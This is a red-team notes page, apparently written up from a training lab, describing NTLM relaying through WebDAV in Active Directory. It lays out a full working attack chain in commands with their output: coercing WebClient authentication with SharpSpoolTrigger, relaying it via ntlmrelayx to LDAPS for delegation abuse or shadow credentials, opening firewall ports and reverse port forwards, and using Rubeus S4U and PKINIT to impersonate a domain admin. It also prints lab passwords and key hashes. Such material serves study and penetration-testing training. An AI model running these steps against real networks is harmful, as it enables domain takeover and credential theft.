What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 7 days ago

Web Distributed Authoring and Versioning (aka WebDAV) is an extension that allows for basic file operations (create/copy/move/delete) over the HTTP protocol. Windows supports the use of WebDAV via Explorer where users can enter a URI or map a drive to a WebDAV server. The WebClient service facilitates Explorer's ability to use WebDAV. This is set to DEMAND_START by default, so is generally only running if a user has actively used a WebDAV resource. Some Windows technologies, such as SharePoint, use WebDAV fairly heavily.

As by Lee Christensen, the WebClient exposes a named pipe called DAV RPC SERVICE, which makes it fairly easy to enumerate remote targets to establish whether the WebClient service is running or not. The repo by provides C# and BOF projects that check for the presence of this named pipe.

This output shows that the service is running WKSTN-1, which makes it a viable target for this attack. The steps are to coerce the service into authenticating to a malicious WebDAV server that we control and then relay the authentication. A nice aspect of this attack is that we can force authentication to occur over any port, so we don't have to worry about needing PortBender (I can hear you all cheering). All we need to ensure is that whatever port we choose is allowed inbound on the host firewall we're reverse port forwarding from.

The incoming authentication material will be that of the machine account. ntlmrelayx can relay this to LDAP on a domain controller to abuse either RBCD (using the --delegate-access flag) or shadow creds (using the --shadow-credentials flag). In either case, ensure you run the HTTP server on a port that will not clash with any of your HTTP listeners. In this example, I've used port 8888.

Once that's up and running, punch a hole in the firewall and set the reverse port forward.

Then use SharpSystemTriggers to trigger the authentication. The WebDAV URL needs to point to the reverse port forward.

Once the traffic hits ntlmrelayx, it will relay to the domain controller.

As indicated by the output above, a new machine account PVWUMPYT$ was created with password 4!t1}}I_CGJ}0OJ, which now has delegation rights to WKSTN-1$. To complete the attack chain, calculate the AES256 hash from the password.

Then perform the S4U2Proxy to request service tickets of your choosing.

Don't forget to remove the fake computer account.

The shadow credentials option will automatically dump a certificate file for you.

It can be converted to ccache format to use with Impacket, or base64 encoded to use with Rubeus.

Since this is a certificate, we use it to request a TGT first which can then be used for S4U2Self.

Ensure the keys are deleted after the attack.

C:\Users\bfarmer>sc qc WebClient
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WebClient
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalService -p
        LOAD_ORDER_GROUP   : NetworkProvider
        TAG                : 0
        DISPLAY_NAME       : WebClient
        DEPENDENCIES       : MRxDAV
        SERVICE_START_NAME : NT AUTHORITY\LocalService
discovered
GetWebDAVStatus
Dave Cossa
beacon> inline-execute C:\Tools\GetWebDAVStatus\GetWebDAVStatus_BOF\GetWebDAVStatus_x64.o wkstn-1,wkstn-2
[+] WebClient service is active on wkstn-1
[x] Unable to hit DAV pipe on wkstn-2, system is either unreachable or does not have WebClient service running
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t ldaps://10.10.122.10 --delegate-access -smb2support --http-port 8888
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8888
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> powershell New-NetFirewallRule -DisplayName "8888-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8888
beacon> rportfwd 8888 localhost 8888
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe wkstn-1 wkstn-2@8888/pwned
[*] HTTPD(8888): Connection from 127.0.0.1 controlled, attacking target ldaps://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:636-<><>-OK
[*] HTTPD(8888): Authenticating against ldaps://10.10.122.10 as DEV/WKSTN-1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=dev,DC=cyberbotic,DC=io
[*] Adding new computer with username: PVWUMPYT$ and password: 4!t1}}I_CGJ}0OJ result: OK
[*] Delegation rights modified succesfully!
[*] PVWUMPYT$ can now impersonate users on WKSTN-1$ via S4U2Proxy
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /domain:dev.cyberbotic.io /user:PVWUMPYT$ /password:'4!t1}}I_CGJ}0OJ'

[*] Action: Calculate Password Hash(es)

[*] Input password             : 4!t1}}I_CGJ}0OJ
[*] Input username             : PVWUMPYT$
[*] Input domain               : dev.cyberbotic.io
[*] Salt                       : DEV.CYBERBOTIC.IOhostpvwumpyt.dev.cyberbotic.io
[*]       rc4_hmac             : 2405A4D372AD265E38CF96FD6AF9B287
[*]       aes128_cts_hmac_sha1 : 8C7958F5262F804225B24D932BE02840
[*]       aes256_cts_hmac_sha1 : 46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2
[*]       des_cbc_md5          : 49E0B985C1E00808
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:PVWUMPYT$ /impersonateuser:nlamb /msdsspn:cifs/wkstn-1.dev.cyberbotic.io /aes256:46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2 /nowrap

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 46B94228F43282498F562FEF99C5C4AF67269BE5C8AD31B193135C7BD38A28A2
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\PVWUMPYT$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
      
	doIFyj[...snip...]5pbw==

[*] Action: S4U

[*] Building S4U2self request for: 'PVWUMPYT$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Got a TGS for 'nlamb' to 'PVWUMPYT$@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
      
	doIFhj[...snip...]BZVCQ=

[*] Impersonating user 'nlamb' to target SPN 'cifs/wkstn-1.dev.cyberbotic.io'
[*] Building S4U2proxy request for service: 'cifs/wkstn-1.dev.cyberbotic.io'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2proxy request to domain controller 10.10.122.10:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/wkstn-1.dev.cyberbotic.io':
      
	doIGfj[...snip...]5pbw==
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t ldaps://10.10.122.10 --shadow-credentials -smb2support --http-port 8888

[...snip...]

[*] HTTPD(8888): Connection from 127.0.0.1 controlled, attacking target ldaps://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:636-<><>-OK
[*] HTTPD(8888): Authenticating against ldaps://10.10.122.10 as DEV/WKSTN-1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Searching for the target account
[*] Target user found: CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f2648f64-f170-cdaf-ba91-e4c0f0dfc540
[*] Updating the msDS-KeyCredentialLink attribute of WKSTN-1$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: ROsU1G59.pfx
[*] Must be used with password: wBaP2YhsR7RgY0MZ6jwk
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx ROsU1G59.pfx -pfx-pass wBaP2YhsR7RgY0MZ6jwk dev.cyberbotic.io/WKSTN-1$ ROsU1G59.ccache
attacker@ubuntu ~> cat ROsU1G59.pfx | base64 -w 0
MIII3Q[...snip...]YFLqI=
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIII3Q[...snip...]YFLqI= /password:wBaP2YhsR7RgY0MZ6jwk /nowrap

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=WKSTN-1$ 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
      
	doIGkD[...snip...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  WKSTN-1$
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  3/7/2024 7:21:57 PM
  EndTime                  :  3/8/2024 5:21:57 AM
  RenewTill                :  3/14/2024 7:21:57 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  +AsTZnOAH3IJ3FX03HAXvFQ1WGFp4yCF3NZ3YtBnmTo=
  ASREP (key)              :  6F0D7FCE1705DD3D851AEA768F8BDBA6BA24194D012A0A06A05B52F60108D946
PreviousNTLM RelayingNextAD Certificate Services
  1. Active Directory
  2. Pivoting

Relaying WebDAV